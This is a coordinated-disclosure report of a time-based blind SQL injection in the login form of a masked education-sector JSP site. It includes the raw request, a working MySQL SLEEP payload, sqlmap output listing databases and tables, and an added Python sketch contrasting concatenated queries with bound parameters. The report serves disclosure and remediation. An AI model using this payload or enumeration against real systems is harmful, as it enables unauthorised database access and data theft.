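2015-10-19: Details reported to the vendor; awaiting vendor response
2015-10-23: Vendor confirmed; details disclosed to the vendor only
2015-11-02: Details disclosed to core white hats and experts in the relevant field
2015-11-12: Details disclosed to regular white hats
2015-11-22: Details disclosed to intern white hats
2015-12-07: Details disclosed to the public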
RT
POST /manageredu/enter.jsp HTTP/1.1
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: JSESSIONID=1F19EF1F96825DB4BA904FA19078175E; JSESSIONID=1F19EF1F96825DB4BA904FA19078175E; AJSTAT_ok_pages=10; AJSTAT_ok_times=1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

hdn_submit_sign=submit&txt_password=g00dPa%24%24w0rD&txt_username=*
The txt_username parameter is vulnerable to SQL injection.
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: hdn_submit_sign=submit&txt_password=g00dPa$$w0rD&txt_username=') AND (SELECT * FROM (SELECT(SLEEP(5)))otmI) AND ('uBut'='uBut
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: hdn_submit_sign=submit&txt_password=g00dPa$$w0rD&txt_username=') AND (SELECT * FROM (SELECT(SLEEP(5)))otmI) AND ('uBut'='uBut
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
available databases [4]:
[*] edu
[*] information_schema
[*] mysql
[*] test
I enumerated the tables:
Database: mysql
[17 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| func                      |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| proc                      |
| procs_priv                |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+

Database: edu
[34 tables]
+--------------------+
| NewTable           |
| adcounter          |
| area_code          |
| attach             |
| broad              |
| broad_content      |
| degree1_code       |
| dept_code          |
| dept_user_code     |
| dir_attach         |
| flow_code          |
| flow_content       |
| flow_log           |
| general_code       |
| jyfa_tixing        |
| jyfauploadlog      |
| logs               |
| role_code          |
| school_code        |
| school_user_code   |
| special_code       |
| special_logs       |
| t_ad               |
| t_ad_posion        |
| t_article          |
| t_article_contents |
| t_channel_article  |
| t_links            |
| t_lqk06            |
| tbl_channel        |
| tbl_nation         |
| tech_post_code     |
| upload_file        |
| zhiwei_code        |
+--------------------+
I did not dig any further.
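Added example (not part of the original report and not the affected application's code): the `')` at the start of the sqlmap payload indicates that txt_username lands inside a `('...')` literal in a concatenated statement, and the sketch below contrasts that pattern with a bound parameter. The query shape, the `users` table and its columns are assumptions, and an in-memory SQLite database stands in for MySQL.

```python
import sqlite3

# txt_username value copied from the sqlmap output in this report.
PAGE_PAYLOAD = "') AND (SELECT * FROM (SELECT(SLEEP(5)))otmI) AND ('uBut'='uBut"

def make_db():
    """Constructed in-memory table; the application's real schema is unknown."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE)")
    db.executemany("INSERT INTO users (username) VALUES (?)",
                   [("admin",), ("o'brien",)])
    return db

def build_lookup_concat(username):
    """Vulnerable pattern (assumed shape): input pasted into the SQL text."""
    return "SELECT id FROM users WHERE username = ('" + username + "')"

def sql_outside_literals(statement):
    """Blank out every '...' literal, keeping only what is parsed as syntax.
    Models standard '' quoting only, not MySQL backslash escapes."""
    out, in_literal, i = [], False, 0
    while i < len(statement):
        ch = statement[i]
        if ch == "'":
            if in_literal and statement[i + 1:i + 2] == "'":
                i += 2          # doubled quote: still inside the literal
                continue
            in_literal = not in_literal
        elif not in_literal:
            out.append(ch)
        i += 1
    return "".join(out)

def input_alters_syntax(username):
    """True when the input changes the statement's structure, not just its data."""
    baseline = sql_outside_literals(build_lookup_concat(""))
    return sql_outside_literals(build_lookup_concat(username)) != baseline

def find_user_bound(db, username):
    """Hardened form: constant SQL text, value passed as a bound parameter."""
    row = db.execute("SELECT id FROM users WHERE username = (?)",
                     (username,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    for name in ("admin", "o'brien", PAGE_PAYLOAD):
        print(repr(name), input_alters_syntax(name), find_user_bound(db, name))
```

In a JSP/JDBC application the same fix is a `PreparedStatement` with `?` placeholders; the bound form also lets a legitimate name containing an apostrophe work, which the concatenated form breaks on.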
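Severity: High
Vulnerability Rank: 10
Confirmed: 2015-10-23 11:24
CNVD has confirmed and reproduced the reported vulnerability. It has been handed to CNCERT for dispatch to the corresponding regional sub-center, which will follow up and coordinate handling with the organization that manages the site.
None yet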